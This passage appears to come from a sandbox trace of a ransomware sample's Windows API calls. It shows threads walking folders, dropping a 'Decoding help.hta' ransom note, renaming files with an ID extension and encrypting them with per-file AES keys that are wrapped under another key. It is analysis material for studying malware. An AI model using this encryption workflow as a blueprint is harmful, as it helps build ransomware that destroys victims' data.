Maker\\Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" [0041.152] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned 41 [0041.152] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\", lpString2="Parity.fx" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx" [0041.152] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx" [0041.153] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx.[ID]g9uZrLhJaygpwRm1[ID]" [0041.153] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx" (normalized: "c:\\program files\\dvd maker\\shared\\parity.fx"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\parity.fx.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.153] FindNextFileW (in: hFindFile=0x5d7f50, lpFindFileData=0xc58fd30 | out: lpFindFileData=0xc58fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93e437ad, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93e437ad, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x689cd275, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8edf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parity.fx", cAlternateFileName="")) returned 0 [0041.153] FindClose (in: hFindFile=0x5d7f50 | out: hFindFile=0x5d7f50) returned 1 Thread: id = 141 os_tid = 0x8f8 [0040.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0xc6cfd30 | out: lpFindFileData=0xc6cfd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8110 [0041.788] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.788] FindNextFileW (in: hFindFile=0x5d8110, lpFindFileData=0xc6cfd30 | out: lpFindFileData=0xc6cfd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.788] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.788] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.788] FindNextFileW (in: hFindFile=0x5d8110, lpFindFileData=0xc6cfd30 | out: lpFindFileData=0xc6cfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee4bb7b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveLR.cab", cAlternateFileName="")) returned 1 [0041.788] lstrcpyW (in: lpString1=0x9a73010, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*" [0041.788] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.788] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.788] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.788] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e0 [0042.020] WriteFile (in: hFile=0x4e0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xc6cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xc6cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.021] CloseHandle (hObject=0x4e0) returned 1 [0042.021] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.022] lstrcmpiW (lpString1="Decoding help.hta", lpString2="GrooveLR.cab") returned -1 [0042.022] lstrlenW (lpString="GrooveLR.cab") returned 12 [0042.022] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*" [0042.022] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0042.022] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", lpString2="GrooveLR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" [0042.022] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" [0042.022] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0042.022] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.147] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x55c [0042.147] CreateFileMappingA (hFile=0x55c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x560 [0042.147] CryptAcquireContextA (in: phProv=0xc6cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xc6cfcec*=0x1151f340) returned 1 [0047.478] CryptGenKey (in: hProv=0x1151f340, Algid=0x6610, dwFlags=0x1, phKey=0xc6cfce8 | out: phKey=0xc6cfce8*=0x5d8b50) returned 1 [0047.478] CryptExportKey (in: hKey=0x5d8b50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xc6cfbe4, pdwDataLen=0xc6cfce4 | out: pbData=0xc6cfbe4*, pdwDataLen=0xc6cfce4*=0x2c) returned 1 [0047.478] MapViewOfFile (hFileMappingObject=0x560, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x11c60000 [0048.237] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc6cfbe4*, pdwDataLen=0xc6cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xc6cfbe4*, pdwDataLen=0xc6cfcf8*=0x100) returned 1 [0049.195] CryptEncrypt (in: hKey=0x5d8b50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x11c60000, pdwDataLen=0xc6cfce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x11c60000*, pdwDataLen=0xc6cfce4*=0x100000) returned 1 [0049.684] UnmapViewOfFile (lpBaseAddress=0x11c60000) returned 1 [0050.301] CloseHandle (hObject=0x560) returned 1 [0050.301] CryptDestroyKey (hKey=0x5d8b50) returned 1 [0050.301] CryptReleaseContext (hProv=0x1151f340, dwFlags=0x0) returned 1 [0050.302] SetFilePointerEx (in: hFile=0x55c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0050.302] WriteFile (in: hFile=0x55c, lpBuffer=0xc6cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xc6cfcf8, lpOverlapped=0x0 | out: lpBuffer=0xc6cfbe4*, lpNumberOfBytesWritten=0xc6cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0051.956] WriteFile (in: hFile=0x55c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xc6cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xc6cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0051.957] CloseHandle (hObject=0x55c) returned 1 [0056.003] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0057.463] FindNextFileW (in: hFindFile=0x5d8110, lpFindFileData=0xc6cfd30 | out: lpFindFileData=0xc6cfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee3b15e0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x264400, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveMUI.msi", cAlternateFileName="GROOVE~1.MSI")) returned 1 [0057.463] lstrcpyW (in: lpString1=0x10d06a10, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*" [0057.463] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0057.463] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0057.463] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0057.463] lstrcmpiW (lpString1="Decoding help.hta", lpString2="GrooveMUI.msi") returned -1 [0057.463] lstrlenW (lpString="GrooveMUI.msi") returned 13 [0057.463] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*" [0057.463] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0057.463] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", lpString2="GrooveMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" [0057.463] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" [0057.464] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0057.464] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0057.464] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x730 [0057.464] CreateFileMappingA (hFile=0x730, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x304 [0057.465] CryptAcquireContextA (in: phProv=0xc6cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xc6cfcec*=0x34493e0) returned 1 [0060.140] CryptGenKey (in: hProv=0x34493e0, Algid=0x6610, dwFlags=0x1, phKey=0xc6cfce8 | out: phKey=0xc6cfce8*=0x5e34f0) returned 1 [0060.140] CryptExportKey (in: hKey=0x5e34f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xc6cfbe4, pdwDataLen=0xc6cfce4 | out: pbData=0xc6cfbe4*, pdwDataLen=0xc6cfce4*=0x2c) returned 1 [0060.140] MapViewOfFile (hFileMappingObject=0x304, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x5fd0000 [0062.885] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc6cfbe4*, pdwDataLen=0xc6cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xc6cfbe4*, pdwDataLen=0xc6cfcf8*=0x100) returned 1 [0062.886] CryptEncrypt (hKey=0x5e34f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5fd0000, pdwDataLen=0xc6cfce4*=0x100000, dwBufLen=0x100000) Thread: id = 142 os_tid = 0x900 [0040.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8310 [0041.773] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.773] FindNextFileW (in: hFindFile=0x5d8310, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.773] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.773] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.773] FindNextFileW (in: hFindFile=0x5d8310, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0041.773] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0041.773] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0041.773] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0041.776] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*" [0041.776] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.776] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033" [0041.776] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*.*" [0041.776] GlobalMemoryStatus (in: lpBuffer=0x440fd10 | out: lpBuffer=0x440fd10) [0041.776] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5e58b40, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x474 [0041.777] CloseHandle (hObject=0x474) returned 1 [0041.777] FindNextFileW (in: hFindFile=0x5d8310, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x0, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0041.777] lstrcpyW (in: lpString1=0x9a73010, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*" [0041.777] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.777] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.777] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0041.778] WriteFile (in: hFile=0x474, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x440fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x440fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.779] CloseHandle (hObject=0x474) returned 1 [0041.779] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.779] lstrcmpiW (lpString1="Decoding help.hta", lpString2="branding.xml") returned 1 [0041.779] lstrlenW (lpString="branding.xml") returned 12 [0041.779] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*" [0041.779] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.779] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="branding.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" [0041.779] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" [0041.779] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0041.779] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.[id]g9uzrlhjaygpwrm1[id]")) 